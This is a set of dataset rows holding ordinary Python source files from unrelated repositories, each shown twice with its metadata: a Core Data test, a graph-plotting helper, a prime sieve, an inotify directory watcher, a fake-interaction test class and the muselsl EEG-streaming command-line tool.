first as unsigned, then signed. (the overlapping # integer ranges have identical bit representation, so there is no # ambiguity) Read and parse a reply from the controller. Raise an exception if an error was reported. # insert an extra stop to ensure the program can't leak # into previously written code. | 2.148772 | 2 |
tests/generators/ios/test_core_data.py | brianleungwh/signals | 3 | 9115 | import unittest
from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder
class CoreDataTestCase(unittest.TestCase):
def test_get_current_version(self):
version_name = get_current_version('./tests/files/doubledummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy 2.xcdatamodel')
version_name = get_current_version('./tests/files/dummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy.xcdatamodel')
def test_get_core_data_from_folder(self):
xcdatamodeld_path = './tests/files/doubledummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy 2.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
xcdatamodeld_path = './tests/files/dummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
| import unittest
from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder
class CoreDataTestCase(unittest.TestCase):
def test_get_current_version(self):
version_name = get_current_version('./tests/files/doubledummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy 2.xcdatamodel')
version_name = get_current_version('./tests/files/dummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy.xcdatamodel')
def test_get_core_data_from_folder(self):
xcdatamodeld_path = './tests/files/doubledummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy 2.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
xcdatamodeld_path = './tests/files/dummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
| none | 1 | 2.394328 | 2 |
|
mcmc/plot_graph.py | hudalao/mcmc | 0 | 9116 | <filename>mcmc/plot_graph.py
# commend the lines for plotting using
import matplotlib.pyplot as plt
import networkx as nx
def plot_graph(G, N, time_point, posi):
#setting up for graph plotting
#setting the positions for all nodes
pos = {}
for ii in range(N):
pos[ii] = posi[ii]
# plt.figure(time_point + 1)
elarge=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] >0.5]
esmall=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] <=0.5]
# nodes
# nx.draw_networkx_nodes(G[time_point],pos,node_size=200)
# edges
# nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3)
# nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed')
# labels
# nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif')
| <filename>mcmc/plot_graph.py
# commend the lines for plotting using
import matplotlib.pyplot as plt
import networkx as nx
def plot_graph(G, N, time_point, posi):
#setting up for graph plotting
#setting the positions for all nodes
pos = {}
for ii in range(N):
pos[ii] = posi[ii]
# plt.figure(time_point + 1)
elarge=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] >0.5]
esmall=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] <=0.5]
# nodes
# nx.draw_networkx_nodes(G[time_point],pos,node_size=200)
# edges
# nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3)
# nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed')
# labels
# nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif')
| en | 0.443927 | # commend the lines for plotting using #setting up for graph plotting #setting the positions for all nodes # plt.figure(time_point + 1) # nodes # nx.draw_networkx_nodes(G[time_point],pos,node_size=200) # edges # nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3) # nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed') # labels # nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif') | 3.097418 | 3 |
Number Theory/Sieve_of_Eratosthenes.py | mishrakeshav/Competitive-Programming | 2 | 9117 | from sys import stdin
input = stdin.readline
N = int(input())
primes = [1]*(N+1)
primes[0] = 0
primes[1] = 0
for i in range(2,int(N**0.5)+1):
if primes[i]:
for j in range(i*i,N+1,i):
primes[j] = 0
for i in range(N+1):
if primes[i]:
print(i,end = " ")
| from sys import stdin
input = stdin.readline
N = int(input())
primes = [1]*(N+1)
primes[0] = 0
primes[1] = 0
for i in range(2,int(N**0.5)+1):
if primes[i]:
for j in range(i*i,N+1,i):
primes[j] = 0
for i in range(N+1):
if primes[i]:
print(i,end = " ")
| none | 1 | 3.400944 | 3 |
|
powerline/lib/tree_watcher.py | kruton/powerline | 19 | 9118 | <filename>powerline/lib/tree_watcher.py
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, absolute_import, print_function)
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import sys
import os
import errno
from time import sleep
from powerline.lib.monotonic import monotonic
from powerline.lib.inotify import INotify, INotifyError
class NoSuchDir(ValueError):
pass
class BaseDirChanged(ValueError):
pass
class DirTooLarge(ValueError):
def __init__(self, bdir):
ValueError.__init__(self, 'The directory {0} is too large to monitor. Try increasing the value in /proc/sys/fs/inotify/max_user_watches'.format(bdir))
def realpath(path):
return os.path.abspath(os.path.realpath(path))
class INotifyTreeWatcher(INotify):
is_dummy = False
def __init__(self, basedir, ignore_event=None):
super(INotifyTreeWatcher, self).__init__()
self.basedir = realpath(basedir)
self.watch_tree()
self.modified = True
self.ignore_event = (lambda path, name: False) if ignore_event is None else ignore_event
def watch_tree(self):
self.watched_dirs = {}
self.watched_rmap = {}
try:
self.add_watches(self.basedir)
except OSError as e:
if e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
def add_watches(self, base, top_level=True):
''' Add watches for this directory and all its descendant directories,
recursively. '''
base = realpath(base)
# There may exist a link which leads to an endless
# add_watches loop or to maximum recursion depth exceeded
if not top_level and base in self.watched_dirs:
return
try:
is_dir = self.add_watch(base)
except OSError as e:
if e.errno == errno.ENOENT:
# The entry could have been deleted between listdir() and
# add_watch().
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
if e.errno == errno.EACCES:
# We silently ignore entries for which we dont have permission,
# unless they are the top level dir
if top_level:
raise NoSuchDir('You do not have permission to monitor {0}'.format(base))
return
raise
else:
if is_dir:
try:
files = os.listdir(base)
except OSError as e:
if e.errno in (errno.ENOTDIR, errno.ENOENT):
# The dir was deleted/replaced between the add_watch()
# and listdir()
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
raise
for x in files:
self.add_watches(os.path.join(base, x), top_level=False)
elif top_level:
# The top level dir is a file, not good.
raise NoSuchDir('The dir {0} does not exist'.format(base))
def add_watch(self, path):
import ctypes
bpath = path if isinstance(path, bytes) else path.encode(self.fenc)
wd = self._add_watch(self._inotify_fd, ctypes.c_char_p(bpath),
# Ignore symlinks and watch only directories
self.DONT_FOLLOW | self.ONLYDIR |
self.MODIFY | self.CREATE | self.DELETE |
self.MOVE_SELF | self.MOVED_FROM | self.MOVED_TO |
self.ATTRIB | self.DELETE_SELF)
if wd == -1:
eno = ctypes.get_errno()
if eno == errno.ENOTDIR:
return False
raise OSError(eno, 'Failed to add watch for: {0}: {1}'.format(path, self.os.strerror(eno)))
self.watched_dirs[path] = wd
self.watched_rmap[wd] = path
return True
def process_event(self, wd, mask, cookie, name):
if wd == -1 and (mask & self.Q_OVERFLOW):
# We missed some INOTIFY events, so we dont
# know the state of any tracked dirs.
self.watch_tree()
self.modified = True
return
path = self.watched_rmap.get(wd, None)
if path is not None:
self.modified = not self.ignore_event(path, name)
if mask & self.CREATE:
# A new sub-directory might have been created, monitor it.
try:
self.add_watch(os.path.join(path, name))
except OSError as e:
if e.errno == errno.ENOENT:
# Deleted before add_watch()
pass
elif e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
else:
raise
if (mask & self.DELETE_SELF or mask & self.MOVE_SELF) and path == self.basedir:
raise BaseDirChanged('The directory %s was moved/deleted' % path)
def __call__(self):
self.read()
ret = self.modified
self.modified = False
return ret
class DummyTreeWatcher(object):
is_dummy = True
def __init__(self, basedir):
self.basedir = realpath(basedir)
def __call__(self):
return False
class TreeWatcher(object):
def __init__(self, expire_time=10):
self.watches = {}
self.last_query_times = {}
self.expire_time = expire_time * 60
def watch(self, path, logger=None, ignore_event=None):
path = realpath(path)
try:
w = INotifyTreeWatcher(path, ignore_event=ignore_event)
except (INotifyError, DirTooLarge) as e:
if logger is not None and not isinstance(e, INotifyError):
logger.warn('Failed to watch path: {0} with error: {1}'.format(path, e))
w = DummyTreeWatcher(path)
self.watches[path] = w
return w
def is_actually_watched(self, path):
w = self.watches.get(path, None)
return not getattr(w, 'is_dummy', True)
def expire_old_queries(self):
pop = []
now = monotonic()
for path, lt in self.last_query_times.items():
if now - lt > self.expire_time:
pop.append(path)
for path in pop:
del self.last_query_times[path]
def __call__(self, path, logger=None, ignore_event=None):
path = realpath(path)
self.expire_old_queries()
self.last_query_times[path] = monotonic()
w = self.watches.get(path, None)
if w is None:
try:
self.watch(path, logger=logger, ignore_event=ignore_event)
except NoSuchDir:
pass
return True
try:
return w()
except BaseDirChanged:
self.watches.pop(path, None)
return True
except DirTooLarge as e:
if logger is not None:
logger.warn(str(e))
self.watches[path] = DummyTreeWatcher(path)
return False
if __name__ == '__main__':
w = INotifyTreeWatcher(sys.argv[-1])
w()
print ('Monitoring', sys.argv[-1], 'press Ctrl-C to stop')
try:
while True:
if w():
print (sys.argv[-1], 'changed')
sleep(1)
except KeyboardInterrupt:
raise SystemExit(0)
| <filename>powerline/lib/tree_watcher.py
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, absolute_import, print_function)
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import sys
import os
import errno
from time import sleep
from powerline.lib.monotonic import monotonic
from powerline.lib.inotify import INotify, INotifyError
class NoSuchDir(ValueError):
pass
class BaseDirChanged(ValueError):
pass
class DirTooLarge(ValueError):
def __init__(self, bdir):
ValueError.__init__(self, 'The directory {0} is too large to monitor. Try increasing the value in /proc/sys/fs/inotify/max_user_watches'.format(bdir))
def realpath(path):
return os.path.abspath(os.path.realpath(path))
class INotifyTreeWatcher(INotify):
is_dummy = False
def __init__(self, basedir, ignore_event=None):
super(INotifyTreeWatcher, self).__init__()
self.basedir = realpath(basedir)
self.watch_tree()
self.modified = True
self.ignore_event = (lambda path, name: False) if ignore_event is None else ignore_event
def watch_tree(self):
self.watched_dirs = {}
self.watched_rmap = {}
try:
self.add_watches(self.basedir)
except OSError as e:
if e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
def add_watches(self, base, top_level=True):
''' Add watches for this directory and all its descendant directories,
recursively. '''
base = realpath(base)
# There may exist a link which leads to an endless
# add_watches loop or to maximum recursion depth exceeded
if not top_level and base in self.watched_dirs:
return
try:
is_dir = self.add_watch(base)
except OSError as e:
if e.errno == errno.ENOENT:
# The entry could have been deleted between listdir() and
# add_watch().
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
if e.errno == errno.EACCES:
# We silently ignore entries for which we dont have permission,
# unless they are the top level dir
if top_level:
raise NoSuchDir('You do not have permission to monitor {0}'.format(base))
return
raise
else:
if is_dir:
try:
files = os.listdir(base)
except OSError as e:
if e.errno in (errno.ENOTDIR, errno.ENOENT):
# The dir was deleted/replaced between the add_watch()
# and listdir()
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
raise
for x in files:
self.add_watches(os.path.join(base, x), top_level=False)
elif top_level:
# The top level dir is a file, not good.
raise NoSuchDir('The dir {0} does not exist'.format(base))
def add_watch(self, path):
import ctypes
bpath = path if isinstance(path, bytes) else path.encode(self.fenc)
wd = self._add_watch(self._inotify_fd, ctypes.c_char_p(bpath),
# Ignore symlinks and watch only directories
self.DONT_FOLLOW | self.ONLYDIR |
self.MODIFY | self.CREATE | self.DELETE |
self.MOVE_SELF | self.MOVED_FROM | self.MOVED_TO |
self.ATTRIB | self.DELETE_SELF)
if wd == -1:
eno = ctypes.get_errno()
if eno == errno.ENOTDIR:
return False
raise OSError(eno, 'Failed to add watch for: {0}: {1}'.format(path, self.os.strerror(eno)))
self.watched_dirs[path] = wd
self.watched_rmap[wd] = path
return True
def process_event(self, wd, mask, cookie, name):
if wd == -1 and (mask & self.Q_OVERFLOW):
# We missed some INOTIFY events, so we dont
# know the state of any tracked dirs.
self.watch_tree()
self.modified = True
return
path = self.watched_rmap.get(wd, None)
if path is not None:
self.modified = not self.ignore_event(path, name)
if mask & self.CREATE:
# A new sub-directory might have been created, monitor it.
try:
self.add_watch(os.path.join(path, name))
except OSError as e:
if e.errno == errno.ENOENT:
# Deleted before add_watch()
pass
elif e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
else:
raise
if (mask & self.DELETE_SELF or mask & self.MOVE_SELF) and path == self.basedir:
raise BaseDirChanged('The directory %s was moved/deleted' % path)
def __call__(self):
self.read()
ret = self.modified
self.modified = False
return ret
class DummyTreeWatcher(object):
is_dummy = True
def __init__(self, basedir):
self.basedir = realpath(basedir)
def __call__(self):
return False
class TreeWatcher(object):
def __init__(self, expire_time=10):
self.watches = {}
self.last_query_times = {}
self.expire_time = expire_time * 60
def watch(self, path, logger=None, ignore_event=None):
path = realpath(path)
try:
w = INotifyTreeWatcher(path, ignore_event=ignore_event)
except (INotifyError, DirTooLarge) as e:
if logger is not None and not isinstance(e, INotifyError):
logger.warn('Failed to watch path: {0} with error: {1}'.format(path, e))
w = DummyTreeWatcher(path)
self.watches[path] = w
return w
def is_actually_watched(self, path):
w = self.watches.get(path, None)
return not getattr(w, 'is_dummy', True)
def expire_old_queries(self):
pop = []
now = monotonic()
for path, lt in self.last_query_times.items():
if now - lt > self.expire_time:
pop.append(path)
for path in pop:
del self.last_query_times[path]
def __call__(self, path, logger=None, ignore_event=None):
path = realpath(path)
self.expire_old_queries()
self.last_query_times[path] = monotonic()
w = self.watches.get(path, None)
if w is None:
try:
self.watch(path, logger=logger, ignore_event=ignore_event)
except NoSuchDir:
pass
return True
try:
return w()
except BaseDirChanged:
self.watches.pop(path, None)
return True
except DirTooLarge as e:
if logger is not None:
logger.warn(str(e))
self.watches[path] = DummyTreeWatcher(path)
return False
if __name__ == '__main__':
w = INotifyTreeWatcher(sys.argv[-1])
w()
print ('Monitoring', sys.argv[-1], 'press Ctrl-C to stop')
try:
while True:
if w():
print (sys.argv[-1], 'changed')
sleep(1)
except KeyboardInterrupt:
raise SystemExit(0)
| en | 0.929685 | # vim:fileencoding=utf-8:noet Add watches for this directory and all its descendant directories, recursively. # There may exist a link which leads to an endless # add_watches loop or to maximum recursion depth exceeded # The entry could have been deleted between listdir() and # add_watch(). # We silently ignore entries for which we dont have permission, # unless they are the top level dir # The dir was deleted/replaced between the add_watch() # and listdir() # The top level dir is a file, not good. # Ignore symlinks and watch only directories # We missed some INOTIFY events, so we dont # know the state of any tracked dirs. # A new sub-directory might have been created, monitor it. # Deleted before add_watch() | 2.192193 | 2 |
python/qisys/test/fake_interact.py | PrashantKumar-sudo/qibuild | 0 | 9119 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Fake Interact """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
class FakeInteract(object):
""" A class to tests code depending on qisys.interact """
def __init__(self):
""" FakeInteract Init """
self.answers_type = None
self.answer_index = -1
self._answers = None
self.questions = list()
self.editor = None
@property
def answers(self):
""" Answers Getter """
if self._answers is None:
raise Exception("FakeInteract not initialized")
return self._answers
@answers.setter
def answers(self, value):
""" Answers Setter """
if isinstance(value, dict):
self.answers_type = "dict"
elif isinstance(value, list):
self.answers_type = "list"
else:
raise Exception("Unknow answer type: " + type(value))
self._answers = value
def find_answer(self, message, choices=None, default=None):
""" Find Answer """
keys = self.answers.keys()
for key in keys:
if key in message.lower():
if not choices:
return self.answers[key]
answer = self.answers[key]
if answer in choices:
return answer
else:
mess = "Would answer %s\n" % answer
mess += "But choices are: %s\n" % choices
raise Exception(mess)
if default is not None:
return default
mess = "Could not find answer for\n :: %s\n" % message
mess += "Known keys are: %s" % ", ".join(keys)
raise Exception(mess)
def ask_choice(self, choices, message, **_unused):
""" Ask Choice """
print("::", message)
for choice in choices:
print("* ", choice)
answer = self._get_answer(message, choices)
print(">", answer)
return answer
def ask_yes_no(self, message, default=False):
""" Ask Yes / No """
print("::", message,)
if default:
print("(Y/n)")
else:
print("(y/N)")
answer = self._get_answer(message, default=default)
print(">", answer)
return answer
def ask_path(self, message):
""" Ask Path """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_string(self, message):
""" Ask String """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_program(self, message):
""" Ask Program """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def get_editor(self):
""" Return the Editor """
return self.editor
def _get_answer(self, message, choices=None, default=None):
""" Get an Answer """
question = dict()
question['message'] = message
question['choices'] = choices
question['default'] = default
self.questions.append(question)
if self.answers_type == "dict":
return self.find_answer(message, choices=choices, default=default)
self.answer_index += 1
return self.answers[self.answer_index]
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Fake Interact """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
class FakeInteract(object):
""" A class to tests code depending on qisys.interact """
def __init__(self):
""" FakeInteract Init """
self.answers_type = None
self.answer_index = -1
self._answers = None
self.questions = list()
self.editor = None
@property
def answers(self):
""" Answers Getter """
if self._answers is None:
raise Exception("FakeInteract not initialized")
return self._answers
@answers.setter
def answers(self, value):
""" Answers Setter """
if isinstance(value, dict):
self.answers_type = "dict"
elif isinstance(value, list):
self.answers_type = "list"
else:
raise Exception("Unknow answer type: " + type(value))
self._answers = value
def find_answer(self, message, choices=None, default=None):
""" Find Answer """
keys = self.answers.keys()
for key in keys:
if key in message.lower():
if not choices:
return self.answers[key]
answer = self.answers[key]
if answer in choices:
return answer
else:
mess = "Would answer %s\n" % answer
mess += "But choices are: %s\n" % choices
raise Exception(mess)
if default is not None:
return default
mess = "Could not find answer for\n :: %s\n" % message
mess += "Known keys are: %s" % ", ".join(keys)
raise Exception(mess)
def ask_choice(self, choices, message, **_unused):
""" Ask Choice """
print("::", message)
for choice in choices:
print("* ", choice)
answer = self._get_answer(message, choices)
print(">", answer)
return answer
def ask_yes_no(self, message, default=False):
""" Ask Yes / No """
print("::", message,)
if default:
print("(Y/n)")
else:
print("(y/N)")
answer = self._get_answer(message, default=default)
print(">", answer)
return answer
def ask_path(self, message):
""" Ask Path """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_string(self, message):
""" Ask String """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def ask_program(self, message):
""" Ask Program """
print("::", message)
answer = self._get_answer(message)
print(">", answer)
return answer
def get_editor(self):
""" Return the Editor """
return self.editor
def _get_answer(self, message, choices=None, default=None):
""" Get an Answer """
question = dict()
question['message'] = message
question['choices'] = choices
question['default'] = default
self.questions.append(question)
if self.answers_type == "dict":
return self.find_answer(message, choices=choices, default=default)
self.answer_index += 1
return self.answers[self.answer_index]
| en | 0.684124 | #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved. # Use of this source code is governed by a BSD-style license (see the COPYING file). Fake Interact A class to tests code depending on qisys.interact FakeInteract Init Answers Getter Answers Setter Find Answer Ask Choice Ask Yes / No Ask Path Ask String Ask Program Return the Editor Get an Answer | 2.750968 | 3 |
muselsl/cli.py | kowalej/muse-lsl | 2 | 9120 | #!/usr/bin/python
import sys
import argparse
class main:
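    """Dispatch ``muselsl <command>`` to the method of the same name.

    Each subcommand method defines its own argparse parser and reads its
    options from ``sys.argv[2:]``.
    """
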
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
    Available commands:
    list            List available Muse devices.
        -b --backend    BLE backend to use. Can be auto, bluemuse, gatt or bgapi.
        -i --interface  The interface to use, 'hci0' for gatt or a com port for bgapi.
    stream          Start an LSL stream from a Muse headset.
        -a --address    Device MAC address.
        -n --name       Device name (e.g. Muse-41D2).
        -b --backend    BLE backend to use. Can be auto, bluemuse, gatt or bgapi.
        -i --interface  The interface to use, 'hci0' for gatt or a com port for bgapi.
    view            Visualize EEG data from an LSL stream.
        -w --window     Window length to display in seconds.
        -s --scale      Scale in uV.
        -r --refresh    Refresh rate in seconds.
        -f --figure     Window size.
        -v --version    Viewer version (1 or 2). Version 1 is the default stable viewer; version 2 is in development and takes no arguments.
    record          Record EEG data from an LSL stream.
        -d --duration   Duration of the recording in seconds.
        -f --filename   Name of the recording file.
        -dj --dejitter  Whether to apply dejitter correction to timestamps.
    record_direct   Record data directly from a Muse headset (no LSL).
        -a --address    Device MAC address.
        -n --name       Device name (e.g. Muse-41D2).
        -b --backend    BLE backend to use. Can be auto, bluemuse, gatt or bgapi.
        -i --interface  The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
| #!/usr/bin/python
import sys
import argparse
class main:
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
Available commands:
list List available Muse devices.
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
stream Start an LSL stream from Muse headset.
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
view Visualize EEG data from an LSL stream.
-w --window Window length to display in seconds.
-s --scale Scale in uV.
-r --refresh Refresh rate in seconds.
-f --figure Window size.
-v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).
record Record EEG data from an LSL stream.
-d --duration Duration of the recording in seconds.
-f --filename Name of the recording file.
-dj --dejitter Whether to apply dejitter correction to timestamps.
record_direct Record data directly from Muse headset (no LSL).
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
